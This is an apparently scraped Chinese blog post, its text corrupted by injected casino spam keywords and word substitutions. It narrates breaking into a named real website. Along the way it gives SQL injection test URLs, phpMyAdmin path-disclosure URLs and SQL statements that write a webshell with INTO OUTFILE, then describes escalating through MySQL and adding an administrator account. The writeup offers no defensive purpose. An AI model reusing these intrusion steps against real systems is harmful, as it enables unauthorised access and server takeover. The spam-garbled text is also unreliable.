快捷搜索:  xxx  as  推理研究所  幼幼  侦探研究所

澳门新葡新京:看黑客是如何黑了落伍者的(图)



前天,据说失队分类信息法度榜样宣布了,就想前去看看,什么样子的.一看,真不愧是失队的产品,风格依然失队,功能还行,大年夜体一看没什么破绽.

看看办事器吧.ping demo.im286澳门新葡新京.com返回IP 58.253澳门新葡新京.71.241打开是个"Directory Listing Denied",没意思.不爱好.

再看看开拓者的站,www.php.com.cn,域名真澳门新葡新京不错,ping一下吧.返回Pinging phper.xihuidc.com.cn [58.253.71.241],看出门道来了,CNAME啊.而且一看域名xihuidc,这个IDC有点2.CNAME切实着实便于治理,然则这样不太好.

ping的同时我也打开了php.com.cn的站点,哟,"Powered by ebcms",先来检测下注入吧.

http://www.php.com.cn/?do=index&cid=3'

http://www.php.com.cn/?do=news&id=4'

这两个猪点不仅掉足了,而且返回了物理地址.D:\public_html\php.com.cn\wwwroot\libraries\syslib\drivers\driver.mysql.php(这个地址很紧张哦)

原先想,有猪点,射治理员密码出来,进后台不就得了吗,读出密码一看,傻眼了.crypt加密的,DZ那边的数据也读出来了.鱼也够BT的,密码暴不出来,而且只登录过一次...(这个也很紧张,细节.)

由于在检测的时刻发明是mysql的root,直接找对象pangolin,读文件吧,怎么读文件也是很有技术的,这里不多说,读到setting.php,终于读到root的密码了.

500)this.width=500" title="点击这里用新窗口浏览图片" />

现在就开始猜phpmyadmin的路径了,这个倒是很顺利.

http://phper.xihuidc.com.cn/phpmyadmin/,然后就很简单了.暴路径,暴路径我给大年夜家几个法子:

引用

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

路径出来了.E:\phpMyadmin\phpmyadmin\libraries\select_lang.lib.php

500)this.width=500" title="点击这里用新窗口浏览图片" />

写个shell进去.

Create TABLE tmdsb(shell text NOT NULL);澳门新葡新京

Insert INTO tmdsb (shell) VALU澳门新葡新京ES('test');

select shell from tmdsb into outfile 'E:\phpMyadmin\phpmyadmin\libraries\php.php';

Drop TABLE tmdsb;

有个小马就好办了,再传个大年夜马进去.发明每个磁盘根目录都不能浏览,以致跳到D:\public_html\php.com.cn\wwwroot\这里也跳不以前,只能在phpmyadmin的目录散步,这里表扬下IDC,做的不错.看看C:\Progra~1,没有SERV-U,不能用Serv-U提权了,上传一个su.php,因为MYSQL因此系统权限安装的,(在WINDOWS办事治理里面可以看到,因此办事加载的)以是,这里我斟酌用MYSQL提权,如图:

(这个shell里的我给拼错了,select和cmdshell,直接导致我以为办事器net.exe做了限定...着实没有...)

500)this.width=500" title="点击这里用新窗口浏览图片" />

500)this.width=500" title="点击这里用新窗口浏览图片" />

改动用户k666.com的密码,并添加到治理员组,成功登岸办事器.

免责声明:以上内容源自网络,版权归原作者所有,如有侵犯您的原创版权请告知,我们将尽快删除相关内容。

您可能还会对下面的文章感兴趣: